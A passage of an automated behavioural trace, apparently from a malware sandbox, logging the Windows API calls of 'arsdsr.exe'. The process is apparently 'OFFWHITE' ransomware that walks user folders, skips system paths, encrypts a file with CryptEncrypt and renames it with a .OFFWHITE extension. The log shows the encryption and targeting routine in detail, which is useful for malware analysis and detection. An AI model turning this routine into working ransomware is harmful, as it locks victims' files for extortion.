lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.740] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360034, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.740] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.740] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.740] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360034, dwReserved1=0x295e9f0, cFileName="Java Update", cAlternateFileName="JAVAUP~1")) returned 1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2=".") returned 1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2="..") returned 1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2="...") returned 1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2="windows") returned -1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2="$recycle.bin") returned 1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2="rsa") returned -1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2="ntuser.dat") returned -1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2="programdata") returned -1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2="appdata") returned 1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2="program files") returned -1 [0151.740] lstrcmpiW (lpString1="Java Update", lpString2="program files (x86)") returned -1 [0151.740] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Sun\\Java\\" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\") returned="C:/Users\\All Users\\Sun\\Java\\" [0151.740] lstrcatW (in: lpString1="C:/Users\\All Users\\Sun\\Java\\", lpString2="Java Update" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update") returned="C:/Users\\All Users\\Sun\\Java\\Java Update" [0151.740] lstrcatW (in: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update\\") returned="C:/Users\\All Users\\Sun\\Java\\Java Update\\" [0151.740] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Sun\\Java\\Java Update\\" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update\\") returned="C:/Users\\All Users\\Sun\\Java\\Java Update\\" [0151.740] lstrcatW (in: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update\\*.*") returned="C:/Users\\All Users\\Sun\\Java\\Java Update\\*.*" [0151.740] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Sun\\Java\\Java Update\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x40003e, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0151.741] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.741] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x40003e, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0151.741] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.741] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.741] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x77, dwReserved0=0x40003e, dwReserved1=0x295e370, cFileName="jaureglist.xml", cAlternateFileName="JAUREG~1.XML")) returned 1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2=".") returned 1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2="..") returned 1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2="...") returned 1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2="windows") returned -1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2="$recycle.bin") returned 1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2="rsa") returned -1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2="ntuser.dat") returned -1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2="programdata") returned -1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2="appdata") returned 1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2="program files") returned -1 [0151.741] lstrcmpiW (lpString1="jaureglist.xml", lpString2="program files (x86)") returned -1 [0151.741] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Sun\\Java\\Java Update\\" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update\\") returned="C:/Users\\All Users\\Sun\\Java\\Java Update\\" [0151.742] lstrcatW (in: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update\\", lpString2="jaureglist.xml" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml") returned="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" [0151.742] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.742] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.742] PathFindExtensionW (pszPath="jaureglist.xml") returned=".xml" [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0151.742] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0151.742] lstrcmpiW (lpString1="jaureglist.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0151.742] GetProcessHeap () returned 0x500000 [0151.742] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526dd8 [0151.742] CreateFileW (lpFileName="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0151.743] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=119) returned 1 [0151.743] GetProcessHeap () returned 0x500000 [0151.743] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0151.743] GetProcessHeap () returned 0x500000 [0151.743] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0151.743] GetProcessHeap () returned 0x500000 [0151.743] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0151.743] GetProcessHeap () returned 0x500000 [0151.743] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0151.744] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.744] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.744] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0151.744] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.744] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.744] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0151.744] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.744] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.744] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295d610*=0x100) returned 1 [0151.744] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.744] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.744] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295d60c*=0x100) returned 1 [0151.744] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.744] SetLastError (dwErrCode=0x0) [0151.744] WriteFile (in: hFile=0x214, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0151.746] GetLastError () returned 0x0 [0151.746] GetLastError () returned 0x0 [0151.746] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x177, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.746] WriteFile (in: hFile=0x214, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0151.746] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x277, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.746] WriteFile (in: hFile=0x214, lpBuffer=0x526dd8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x526dd8*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0151.746] GetProcessHeap () returned 0x500000 [0151.746] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x77) returned 0x511868 [0151.746] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.746] ReadFile (in: hFile=0x214, lpBuffer=0x511868, nNumberOfBytesToRead=0x77, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x511868*, lpNumberOfBytesRead=0x295d840*=0x77, lpOverlapped=0x0) returned 1 [0151.746] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.746] WriteFile (in: hFile=0x214, lpBuffer=0x511868*, nNumberOfBytesToWrite=0x77, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x511868*, lpNumberOfBytesWritten=0x295d84c*=0x77, lpOverlapped=0x0) returned 1 [0151.746] GetProcessHeap () returned 0x500000 [0151.746] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x511868 | out: hHeap=0x500000) returned 1 [0151.746] CloseHandle (hObject=0x214) returned 1 [0151.746] GetProcessHeap () returned 0x500000 [0151.747] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0151.747] GetProcessHeap () returned 0x500000 [0151.747] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0151.747] GetProcessHeap () returned 0x500000 [0151.747] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0151.747] GetProcessHeap () returned 0x500000 [0151.747] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0151.747] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml") returned="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" [0151.747] lstrcatW (in: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml.OFFWHITE") returned="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml.OFFWHITE" [0151.747] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), lpNewFileName="C:/Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml.OFFWHITE" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml.offwhite")) returned 1 [0151.747] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x77, dwReserved0=0x40003e, dwReserved1=0x295e370, cFileName="jaureglist.xml", cAlternateFileName="JAUREG~1.XML")) returned 0 [0151.747] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0151.747] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360034, dwReserved1=0x295e9f0, cFileName="Java Update", cAlternateFileName="JAVAUP~1")) returned 0 [0151.747] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.748] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Java", cAlternateFileName="")) returned 0 [0151.748] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0151.748] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2="...") returned 1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2="$recycle.bin") returned 1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2="rsa") returned 1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2="ntuser.dat") returned 1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2="programdata") returned 1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2="appdata") returned 1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2="program files") returned 1 [0151.748] lstrcmpiW (lpString1="Templates", lpString2="program files (x86)") returned 1 [0151.748] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0151.748] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Templates" | out: lpString1="C:/Users\\All Users\\Templates") returned="C:/Users\\All Users\\Templates" [0151.748] lstrcatW (in: lpString1="C:/Users\\All Users\\Templates", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Templates\\") returned="C:/Users\\All Users\\Templates\\" [0151.748] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Templates\\" | out: lpString1="C:/Users\\All Users\\Templates\\") returned="C:/Users\\All Users\\Templates\\" [0151.748] lstrcatW (in: lpString1="C:/Users\\All Users\\Templates\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Templates\\*.*") returned="C:/Users\\All Users\\Templates\\*.*" [0151.748] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Templates\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Java", cAlternateFileName="")) returned 0xffffffff [0151.748] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0151.748] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0151.748] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0xdd354335, cFileName="Default", cAlternateFileName="")) returned 1 [0151.748] lstrcmpiW (lpString1="Default", lpString2=".") returned 1 [0151.748] lstrcmpiW (lpString1="Default", lpString2="..") returned 1 [0151.748] lstrcmpiW (lpString1="Default", lpString2="...") returned 1 [0151.748] lstrcmpiW (lpString1="Default", lpString2="windows") returned -1 [0151.749] lstrcmpiW (lpString1="Default", lpString2="$recycle.bin") returned 1 [0151.749] lstrcmpiW (lpString1="Default", lpString2="rsa") returned -1 [0151.749] lstrcmpiW (lpString1="Default", lpString2="ntuser.dat") returned -1 [0151.749] lstrcmpiW (lpString1="Default", lpString2="programdata") returned -1 [0151.749] lstrcmpiW (lpString1="Default", lpString2="appdata") returned 1 [0151.749] lstrcmpiW (lpString1="Default", lpString2="program files") returned -1 [0151.749] lstrcmpiW (lpString1="Default", lpString2="program files (x86)") returned -1 [0151.749] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Users\\" | out: lpString1="C:/Users\\") returned="C:/Users\\" [0151.749] lstrcatW (in: lpString1="C:/Users\\", lpString2="Default" | out: lpString1="C:/Users\\Default") returned="C:/Users\\Default" [0151.749] lstrcatW (in: lpString1="C:/Users\\Default", lpString2="\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0151.749] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0151.749] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\*.*") returned="C:/Users\\Default\\*.*" [0151.749] FindFirstFileW (in: lpFileName="C:/Users\\Default\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName=".", cAlternateFileName="")) returned 0x544690 [0151.751] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.751] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.751] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.751] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.751] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="AppData", cAlternateFileName="")) returned 1 [0151.751] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0151.752] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0151.752] lstrcmpiW (lpString1="AppData", lpString2="...") returned 1 [0151.752] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0151.752] lstrcmpiW (lpString1="AppData", lpString2="$recycle.bin") returned 1 [0151.752] lstrcmpiW (lpString1="AppData", lpString2="rsa") returned -1 [0151.752] lstrcmpiW (lpString1="AppData", lpString2="ntuser.dat") returned -1 [0151.752] lstrcmpiW (lpString1="AppData", lpString2="programdata") returned -1 [0151.752] lstrcmpiW (lpString1="AppData", lpString2="appdata") returned 0 [0151.752] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2="...") returned 1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2="$recycle.bin") returned 1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2="rsa") returned -1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2="ntuser.dat") returned -1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2="programdata") returned -1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2="appdata") returned 1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2="program files") returned -1 [0151.752] lstrcmpiW (lpString1="Application Data", lpString2="program files (x86)") returned -1 [0151.752] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0151.752] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Application Data" | out: lpString1="C:/Users\\Default\\Application Data") returned="C:/Users\\Default\\Application Data" [0151.752] lstrcatW (in: lpString1="C:/Users\\Default\\Application Data", lpString2="\\" | out: lpString1="C:/Users\\Default\\Application Data\\") returned="C:/Users\\Default\\Application Data\\" [0151.752] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Application Data\\" | out: lpString1="C:/Users\\Default\\Application Data\\") returned="C:/Users\\Default\\Application Data\\" [0151.752] lstrcatW (in: lpString1="C:/Users\\Default\\Application Data\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Application Data\\*.*") returned="C:/Users\\Default\\Application Data\\*.*" [0151.752] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Application Data\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x75402522, ftCreationTime.dwLowDateTime=0x295e92c, ftCreationTime.dwHighDateTime=0x208, ftLastAccessTime.dwLowDateTime=0x53fc40, ftLastAccessTime.dwHighDateTime=0x508d58, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x295e954, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="￾￿\x02", 